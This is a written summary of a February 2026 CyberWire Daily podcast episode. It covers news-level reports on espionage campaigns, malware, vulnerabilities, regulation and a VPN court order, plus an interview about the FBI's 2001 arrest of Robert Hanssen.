CyberWire Daily — "Rooted and patient."
Date: February 18, 2026
Host: Dave Bittner (N2K Networks)
Guest: Keith Milarski (former FBI Special Agent, Chief Global Ambassador at Q Intel)
Overview
This episode delivers the latest in cybersecurity news, touching on international cyber-espionage, emerging vulnerabilities, response to cyber threats, regulatory changes, and legal developments impacting VPNs. The featured interview with Keith Milarski revisits the arrest of Robert Hanssen, the most damaging spy in FBI history, offering rare firsthand insight on its 25th anniversary.
Key Discussion Points and Insights
1. Cyber-Espionage and Vulnerabilities
China-linked Group Exploits Dell Zero-Day
- [00:02-03:00]
- Google and Mandiant report that UNC6201 (Silk Typhoon) exploited a critical Dell RecoverPoint for VMs vulnerability for at least 18 months, leveraging a hardcoded administrator password for unauthenticated remote root access.
- Long dwell times (400+ days) facilitated deep espionage; attackers deployed Brickstorm, later replaced by Grim Bolt backdoor.
- Quote:
“Officials warn the actors likely remain active in unpatched systems. Long dwell times, often exceeding 400 days, gave attackers room for sustained espionage.” – Dave Bittner [03:00]
Microsoft 365 Copilot AI Data Leak
- [04:00-05:00]
- Since Jan 21, Copilot has been summarizing confidential emails, bypassing Data Loss Prevention (DLP) policies. Fixes began rolling out in February, but full remediation is pending.
- Incident remains under advisory, indicating a limited known scope but ongoing investigation.
Linux Botnet "SSH Stalker" Using IRC
- [05:00-06:40]
- Flare researchers uncovered SSH Stalker, a botnet exploiting legacy Linux kernel flaws, managed via IRC channels.
- It quietly maintains persistence without overt attacks, signaling possible preparation for larger operations.
- Advice:
“Flare recommends monitoring build tools, scanning for malware, and reviewing cron jobs.”
2. Regulation, National Strategies, and Supply Chain Security
Switzerland: Mandatory Cyberattack Reporting
- [06:40-08:00]
- New laws in effect since April 2025; critical infrastructure must report incidents within 24 hours.
- Centralized hubs and increased budgets signal growing focus on coordinated national defense.
Notepad++ Supply Chain Attack and Response
- [11:00-12:00]
- Following a Lotus Blossom Group compromise, Notepad++ now uses “double lock” update verification and other hardening measures.
- Advice:
“Users are urged to upgrade and download installers only from the official website.”
3. Threat Intelligence and Campaigns
"astarion RAT" and Social Engineering Rise
- [08:00-10:00]
- Huntress details a click-fix social engineering campaign deploying Matanbukas loader and a new RAT called astarion.
- Features include encrypted C2 disguised as telemetry, credential theft, proxying, and rapid lateral movement.
- Goal assessed as likely ransomware or data theft.
Iranian-Aligned Espionage Targeting Protest Supporters
- [12:00-13:40]
- “Crescent Harvest” campaign uses Farsi-language Windows shortcut files as malware lures for activists and journalists.
- Malware uses DLL sideloading via a signed Google binary, offering persistent surveillance capabilities.
4. Application Security Flaws
PDF Platform Vulnerabilities
- [10:00-11:00]
- Novi researchers found 16 vulnerabilities in Foxit and Aprise’s cloud PDF tools.
- Threat includes RCE, account takeover, and data exfiltration, especially in enterprise environments.
- Vendors have patched these holes.
5. Policy and Legal Actions
Spain Orders VPNs to Block Football Piracy Sites
- [13:40-15:00]
- Court ordered NordVPN and ProtonVPN to block access to 16 pirate streaming sites under EU Digital Services Act.
- VPNs not given a chance to appeal or represent interests; both providers question due process and efficacy.
- Quote:
“NordVPN also argued that blocking domains is ineffective and that enforcement should target hosting providers and illegal content sources.” – Dave Bittner
6. Featured Interview: Keith Milarski on the 25th Anniversary of Robert Hanssen’s Arrest
Background and Hanssen’s Espionage
- [16:54-19:15]
- Hanssen served as an FBI agent who spied for the Soviets/Russians for over 20 years.
- Compromised sensitive operations, intelligence, and the identities of U.S. human assets.
- Quote:
“He just compromised so many sensitive intelligence operations, human sources, the tunnel that we tried to dig underneath the Soviet embassy… He was just utterly devastating.” – Keith Milarski [16:56]
The Hunt and Discovery
- [19:15-23:22]
- Initial suspicion fell on the CIA, but key evidence (recorded voice, fingerprint on a trash bag) pointed to Hanssen.
- Operation involved tailing Hanssen, planting mics, surveilling his activities, and eventually setting up for an arrest.
The Arrest Itself
- [23:22-27:44]
- Hanssen scheduled a dead drop (“Ellis”) at Foxstone Park, VA for Feb 18, 2001.
- Surveillance teams mobilized early; watched Hanssen prepare and execute the drop.
- SWAT and support teams swarmed and apprehended him as he left the park.
- Quote:
“Your adrenaline starts running… we see him wrap it up, get back in his car and driving over to the park… as he's coming out… that's where we get go take him down… and took him into custody and put handcuffs on him.” – Keith Milarski [25:54-27:44]
Reflections and Emotional Impact
- [27:44-29:33]
- Profound sense of betrayal among FBI ranks, but also relief and pride in securing justice.
- Hanssen’s identification was a narrow window before retirement—arresting him was both a victory and a necessity.
- Quote:
“You work with a colleague and you think everybody…wants to protect the American people. And then to have somebody that is betraying all your work…that is a weird feeling…” – Keith Milarski [28:07]
7. Oddities and Notable Moments
F-35 "Jailbreak" Possibility
- [30:03-end]
- Dutch defense official Gies Tuenman joked about “jailbreaking” an F-35 if US locks out software updates due to shifting alliances.
- Experts dismiss an F-35 as an "iPhone," noting extreme software protections and unique arrangements (only Israel runs its own code).
- Quote:
“The idea of rebooting a fighter jet like a smartphone carries a certain dark charm.” – Dave Bittner
Notable Quotes
-
On root-level persistence by Chinese APT:
“Long dwell times, often exceeding 400 days, gave attackers room for sustained espionage.” – Dave Bittner [03:00]
-
On the Hanssen case:
“He spied for the Soviets and then the Russians for over 20 years. He started first volunteering to the GRU... then the KGB… He just compromised so many sensitive intelligence operations, human sources...” – Keith Milarski [16:56]
-
On the arrest operation:
“We see him wrap it up, get back in his car and driving over to the park… as he's coming out… that's where we get go take him down…” – Keith Milarski [25:54-27:44]
-
On emotional response:
“To have somebody that is betraying all your work to a enemy… that is a weird feeling that just people don't experience.” – Keith Milarski [28:07]
Timestamps for Important Segments
- Chinese APT exploits Dell zero-day: 00:02–03:00
- Microsoft 365 Copilot data leak: 04:00–05:00
- SSH Stalker botnet uncovered: 05:00–06:40
- Switzerland’s new cyber laws: 06:40–08:00
- Huntress: Click-fix campaign & astarion RAT: 08:00–10:00
- Serious PDF vulnerabilities: 10:00–11:00
- Notepad++ supply chain response: 11:00–12:00
- Iranian-aligned “Crescent Harvest” campaign: 12:00–13:40
- Spain orders VPNs to block piracy sites: 13:40–15:00
- Keith Milarski on Robert Hanssen’s espionage & arrest: 16:54–29:33
- Dutch F-35 “jailbreak” controversy: 30:03–end
Episode Tone
The episode offers serious, technical reporting with a tone of urgency and professionalism, especially in the interview, which brings sober, firsthand accounts of high-stakes counterintelligence work. The closing segment injects a touch of dry humor regarding the F-35 “jailbreak” comparison.
This detailed summary covers all critical stories and provides a comprehensive view of the episode's expert insights, ensuring value for listeners and non-listeners alike.